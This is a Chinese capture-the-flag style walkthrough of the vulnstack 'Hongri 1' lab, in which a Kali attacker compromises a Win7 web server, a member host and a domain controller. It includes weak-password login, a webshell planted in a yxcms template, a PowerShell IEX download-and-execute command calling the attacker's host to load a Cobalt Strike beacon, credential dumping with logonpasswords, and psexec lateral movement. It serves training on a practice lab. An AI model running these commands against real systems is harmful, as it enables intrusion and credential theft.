ATT&CK 红日1靶机渗透攻略

环境

此实战靶场共 3 台主机,Win7 作为 Web 服务器,是打入此实战靶场的第一个目标和 入手点,Win2K3 为内网域成员主机,WinSever 2008 R2 为内网域控主机。

下载地址
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

ATT&CK 红日1靶机渗透攻略_第1张图片

环境调试

网卡桥接

主机 网卡 IP
win7(web服务器) 1.VM2 2.NAT 192.168.52.143 and 192.168.8.142
win2003(内网域成员) 1.VM2 192.168.52.141
win2008(内网域控) 1.VM2 192.168.52.138
kail(攻击方) 1.NAT 192.168.8.131

win7:

ATT&CK 红日1靶机渗透攻略_第2张图片

win2003:

ATT&CK 红日1靶机渗透攻略_第3张图片

win2008

ATT&CK 红日1靶机渗透攻略_第4张图片

kali:

ATT&CK 红日1靶机渗透攻略_第5张图片

连通性验证

靶机初始密码hongrisec@2019 本地已经改成123.com

win7与所有主机均可通信

2003和2008互通

kali只能与win7ping通

环境调试

win7开启phpstudy

ATT&CK 红日1靶机渗透攻略_第6张图片

访问成功

ATT&CK 红日1靶机渗透攻略_第7张图片

信息收集

namp端口扫描

nmap -sS -p- 192.168.8.142

ATT&CK 红日1靶机渗透攻略_第8张图片

80主页是phpstudy探针,查看后并无实际价值

ATT&CK 红日1靶机渗透攻略_第9张图片

网站后台扫描

ATT&CK 红日1靶机渗透攻略_第10张图片

下载beifen.rar

ATT&CK 红日1靶机渗透攻略_第11张图片

推测存在yxcms…没扫出来估计是字典不行吧

ATT&CK 红日1靶机渗透攻略_第12张图片

漏洞利用

web漏洞利用

弱口令

一个非常明显的弱口令

ATT&CK 红日1靶机渗透攻略_第13张图片

admin 123456成功登录后台

上传一句话木马

进入前台模板管理写入一句话木马

ATT&CK 红日1靶机渗透攻略_第14张图片

通过之前下载的beifen文件可知前台页面路径

http://192.168.8.142/yxcms/protected/apps/default/view/default/muma.php

ATT&CK 红日1靶机渗透攻略_第15张图片

蚁剑连接

ATT&CK 红日1靶机渗透攻略_第16张图片

cs上线

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.8.131:80/a'))"

生成监听器

ATT&CK 红日1靶机渗透攻略_第17张图片

生成Scripted Web Delivery

ATT&CK 红日1靶机渗透攻略_第18张图片

ATT&CK 红日1靶机渗透攻略_第19张图片

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.8.131:8080/a'))"

复制命令,蚁剑shell执行

在这里插入图片描述

cs上线win7,上线会慢一点,上线后更改sleep时间

ATT&CK 红日1靶机渗透攻略_第20张图片

内网主机探测

shell ipconfig发现存在内网网段192.168.52.0/24

ATT&CK 红日1靶机渗透攻略_第21张图片

portscan 192.168.52.0-192.168.52.255 1-1024,3389,5000-6000 arp 1024

ATT&CK 红日1靶机渗透攻略_第22张图片

发现192.168.52.143 192.168.52.141 192.168.52.138

域内信息收集

域主机探测

net computers

ATT&CK 红日1靶机渗透攻略_第23张图片

dc探测

net dclist

ATT&CK 红日1靶机渗透攻略_第24张图片

导出webserver主机密码

logonpasswords

ATT&CK 红日1靶机渗透攻略_第25张图片

新建smb监听器

ATT&CK 红日1靶机渗透攻略_第26张图片

dc上线

目标–psexec

ATT&CK 红日1靶机渗透攻略_第27张图片

ATT&CK 红日1靶机渗透攻略_第28张图片

你可能感兴趣的:(安全,web安全,网络,渗透测试,网络安全)